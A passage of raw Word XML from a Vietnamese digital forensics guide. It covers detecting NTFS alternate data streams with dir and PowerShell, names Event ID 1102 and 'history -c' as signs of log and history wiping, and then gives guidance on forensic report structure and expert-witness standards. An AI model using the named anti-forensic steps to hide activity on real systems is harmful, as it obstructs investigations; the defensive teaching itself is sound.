          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="phát-hiện-ntfs-alternate-data-streams"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phát hiện NTFS Alternate Data Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05932BBD">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:shd w:val="clear" w:fill="F2F5F7"/>
        <w:spacing w:before="40" w:after="40" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="198" w:right="85"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /r /s C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>\U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>uspect</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Ví dụ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># C:\Users\suspect\tax_return.pdf:hidden_data:$DATA  [8.2 MB]</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Get-Content</w:t>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-Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'C:\Users\suspect\tax_return.pdf'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'hidden_data'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden_data.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden_data.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF19030">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cảnh báo chống pháp chứng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Event ID 1102 thường được ghi trước khi log bị xóa, nên đây là chỉ báo rất có giá trị. Tương tự, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>history -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể xóa history hiện hành nhưng dữ liệu vẫn tồn tại trong RAM cho đến khi tiến trình kết thúc. Trong sự cố đang diễn ra, ưu tiên thu thập bộ nhớ sớm.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkEnd w:id="68"/>
    <w:p w14:paraId="097B97A3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="viết-báo-cáo-và-làm-chứng-chuyên-gia"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>14. Viết báo cáo và làm chứng chuyên gia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C073C9">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Truyền đạt phát hiện kỹ thuật cho thẩm phán, bồi thẩm đoàn, luật sư và lãnh đạo doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFFE5A8">
      <w:pPr>
        <w:pStyle w:val="3"/>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Phân tích kỹ thuật hoàn hảo vẫn có thể vô dụng nếu báo cáo không rõ ràng hoặc chuyên viên không thể bảo vệ phương pháp khi bị thẩm vấn chéo. Kỹ năng viết và trình bày phải được phát triển song song với kỹ năng kỹ thuật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16522608">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="cấu-trúc-báo-cáo-pháp-chứng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>14.1. Cấu trúc báo cáo pháp chứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08719843">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Tóm tắt điều hành:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tổng quan không kỹ thuật cho người ra quyết định; điều gì xảy ra, phát hiện gì và kết luận chính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE736F">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Bối cảnh vụ việc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vấn đề, đơn vị yêu cầu, phạm vi kiểm tra và căn cứ pháp lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B96F3">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Chứng cứ tiếp nhận:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Danh mục đầy đủ, mô tả, serial, hash và ngày nhận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C258A">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Phương pháp pháp chứng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tên/phiên bản công cụ, cách thu thập, bước xác minh và chiến lược phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4018A2">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Phát hiện kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tìm thấy gì, ở đâu, khi nào và ý nghĩa của nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C038671">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Dòng thời gian:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tái dựng sự kiện theo thứ tự thời gian dựa trên chứng cứ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686E806">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Kết luận:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chứng cứ cho thấy điều gì, với mức độ tin cậy phù hợp và không suy đoán.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8544F">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Phụ lục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dữ liệu thô, hash, đầu ra công cụ và biểu mẫu chuỗi lưu giữ.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:p w14:paraId="722F7A4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="nguyên-tắc-viết"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>14.2. Nguyên tắc viết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11565EF3">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Khách quan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nêu điều chứng cứ thể hiện, không viết điều bạn “tin” đã xảy ra. Tách sự kiện quan sát được khỏi diễn giải.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D131818">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Đầy đủ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ghi cả kết quả âm tính và thứ không tìm thấy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295F020">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Chính xác:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dùng timestamp đầy đủ kèm múi giờ, đường dẫn chính xác và hash đầy đủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57006CE6">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Có thể tái lập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chuyên viên đủ năng lực phải có thể xác minh kết quả bằng cùng chứng cứ và phương pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170117B8">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Ngôn ngữ dễ hiểu:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Giải thích khái niệm kỹ thuật theo cách người không chuyên có thể hiểu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CEEC0">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Ngôn ngữ có điều kiện:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dùng “cho thấy”, “phù hợp với”, “gợi ý” khi mức chắc chắn còn giới hạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BA5E3">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Truy nguồn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ghi rõ công cụ, artefact và timestamp tạo ra từng phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4B232">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40"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Định dạng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hash, đường dẫn và lệnh dùng font monospace; timestamp ưu tiên ISO 8601 với UTC.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:p w14:paraId="3C555404">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="tiêu-chuẩn-nhân-chứng-chuyên-gia"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>14.3. Tiêu chuẩn nhân chứng chuyên gia</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3090"/>
        <w:gridCol w:w="6956"/>
      </w:tblGrid>
      <w:tr w14:paraId="6DA0D317">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7C39D93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Tiêu chuẩn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E47891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Yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29623FDC">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1FE22DA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Daubert Standard - Hoa Kỳ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="565B3AB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Phương pháp phải có thể kiểm thử, được phản biện, có tỷ lệ sai số biết được và được chấp nhận trong ngành.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F406B6B">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659B0D1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Civil Procedure Rules - Vương quốc Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73FC197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Nghĩa vụ của chuyên gia là với tòa án, không phải bên thuê mình; có thể ưu tiên chuyên gia chung.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DDF8355">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0857334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Năng lực</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1409372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Học vấn, đào tạo, kinh nghiệm và công bố liên quan; thẩm phán quyết định tư cách.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3554B6AD">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1C90E84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Độc lập</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28E2D37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Tự hình thành ý kiến, không đóng vai người biện hộ cho bên yêu cầu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7882072A">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14662E5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Cơ sở ý kiến</w:t>
            </w:r>
          </w:p>
